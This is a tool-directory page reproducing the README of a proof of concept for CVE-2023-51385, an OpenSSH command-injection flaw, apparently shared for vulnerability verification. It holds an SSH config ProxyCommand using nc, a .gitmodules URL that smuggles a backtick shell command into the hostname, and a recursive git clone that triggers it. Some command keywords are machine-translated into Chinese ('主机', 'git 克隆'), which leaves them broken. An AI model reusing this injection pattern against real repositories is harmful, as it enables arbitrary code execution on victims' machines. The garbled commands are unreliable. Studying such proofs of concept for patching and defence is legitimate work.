Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2023-51385_test — 一个验证对CVE-2023-51385 | Kitploit
Tools/GitHubGitHub/power1314520/cve-2023-51385_test
Vulnerability AnalysisExploitationWeb Application ExploitationPapers & ResearchLearning & Education
GitHubpower1314520/cve-2023-51385_test

CVE-2023-51385_test

一个验证对CVE-2023-51385

View Repository
2 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

##Verify CVE-2023-51385

First, add the following to ~/.ssh/config

root@kitploit:~
主机 *.example.com
  ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p

Command injection exists in the .gitmodules file statement

root@kitploit:~
url = ssh://`echo helloworld > cve.txt`foo.example.com/bar

After configuration is complete, execute the following command to trigger:

root@kitploit:~
git 克隆 https://github.com/zls1793/CVE-2023-51385_test --recurse-submodules

If executed successfully, a cve.txt file will be generated in the CVE-2023-51385_test directory.

![ image-20231225234031349 ] ( https://ltmthink-blogimages.oss-cn-hangzhou.aliyuncs.com/imgs/202312252345762.png )

For details, see the blog post:

https://vin01.github.io/piptagole/ssh/security/openssh/libssh/remote-code-execution/2023/12/20/openssh-proxycommand-libssh-rce.html

Download Tool